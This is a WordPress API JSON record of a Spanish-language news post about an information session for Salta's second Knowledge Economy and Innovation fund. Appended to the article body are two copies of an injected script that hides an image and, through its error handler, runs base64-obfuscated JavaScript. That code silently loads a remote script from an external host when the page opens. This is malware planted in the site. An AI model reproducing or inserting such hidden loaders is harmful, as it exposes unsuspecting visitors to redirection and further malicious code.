{"id":2234,"date":"2023-02-16T21:46:57","date_gmt":"2023-02-17T00:46:57","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2234"},"modified":"2025-08-14T00:23:10","modified_gmt":"2025-08-14T03:23:10","slug":"reunion-informativa-para-acceder-al-2-fondo-salteno-para-potenciar-la-economia-del-conocimiento-y-la-innovacion-tecnologica","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2234","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/reunion-informativa-para-acceder-al-2-fondo-saltenio-para-potenciar-la-economia-del-conocimiento-y-la-innovacion-tecnologica-87899\">Reuni\u00f3n informativa para acceder al 2\u00b0 Fondo Salte\u00f1o para potenciar la Econom\u00eda del Conocimiento y la Innovaci\u00f3n Tecnol\u00f3gica<\/a>"},"content":{"rendered":"\n<h5 class=\"has-background wp-block-heading\" style=\"background-color:#da6c88\"><em><strong>El encuentro ser\u00e1 hoy a las 17 en el COPAIPA (Gral. G\u00fcemes 529) y est\u00e1 organizado por la Uni\u00f3n Industrial de Salta, la C\u00e1mara PyMES y la C\u00e1mara de Comercio e Industria en conjunto con la Agencia de Promoci\u00f3n Cient\u00edfica e Innovaci\u00f3n Tecnol\u00f3gica del Ministerio de Educaci\u00f3n.<\/strong><\/em><\/h5>\n\n\n\n<p>Hoy\u00a0se llev\u00f3 a cabo una reuni\u00f3n informativa y de consulta para acceder a fondos no reembolsables de hasta $30 millones por proyecto, que se otorgar\u00e1n a trav\u00e9s del 2\u00b0 Fondo Salte\u00f1o para potenciar la Econom\u00eda del Conocimiento, el Desarrollo Tecnol\u00f3gico y la Innovaci\u00f3n.<\/p>\n\n\n\n<p>El encuentro, que se realizar\u00e1 en General G\u00fcemes 529 est\u00e1 dirigido a emprendedores, pymes y monotributistas de las categor\u00edas J y K (Venta de cosas muebles) y G y H (Locaciones y prestaciones de servicios) que registren al menos un empleado en relaci\u00f3n de dependencia.<\/p>\n\n\n\n<p>Los interesados en participar podr\u00e1n inscribirse en el siguiente link:\u00a0<a href=\"https:\/\/forms.gle\/tDgwQ9XyVsrXzVBU7\" target=\"_blank\" rel=\"noopener\" title=\"\">https:\/\/forms.gle\/tDgwQ9XyVsrXzVBU7<\/a><\/p>\n\n\n\n<p>El Fondo, creado con aportes de la Agencia salte\u00f1a y la Agencia I+D+i de Naci\u00f3n, busca financiar propuestas innovadoras con potencial de comercializaci\u00f3n e internacionalizaci\u00f3n, que promuevan la generaci\u00f3n de empleos de calidad, brindando nuevos productos o servicios intensivos en conocimiento y tecnolog\u00eda.<\/p>\n\n\n\n<p>Ser\u00e1n seleccionados los proyectos que tengan como meta mejorar las estructuras productivas y la capacidad de las empresas del sector agroindustrial, aquellas que realicen actividades de Econom\u00eda del Conocimiento (Ley N\u00b0 27.506 y modificatorias), aquellas que generen innovaci\u00f3n tecnol\u00f3gica en el sector tur\u00edstico y cultural y aquellas otras orientadas al desarrollo tecnol\u00f3gico en la provisi\u00f3n de servicios al sector minero.<\/p>\n\n\n\n<p>La convocatoria para aplicar al fondo se encuentra abierta hasta el 31 de marzo de este a\u00f1o. Para m\u00e1s informaci\u00f3n, ingresar a:&nbsp;<a href=\"https:\/\/agenciacyt.salta.gob.ar\/\">https:\/\/agenciacyt.salta.gob.ar\/<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El encuentro ser\u00e1 hoy a las 17 en el COPAIPA (Gral. G\u00fcemes 529) y est\u00e1 organizado por la Uni\u00f3n Industrial de Salta, la C\u00e1mara PyMES y la C\u00e1mara de Comercio e Industria en conjunto con la Agencia de Promoci\u00f3n Cient\u00edfica e Innovaci\u00f3n Tecnol\u00f3gica del Ministerio de Educaci\u00f3n. Hoy\u00a0se llev\u00f3 a cabo una reuni\u00f3n informativa y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2235,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-2234","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2234"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2234"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2234\/revisions"}],"predecessor-version":[{"id":7174,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2234\/revisions\/7174"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2235"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2234"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2234"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2234"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}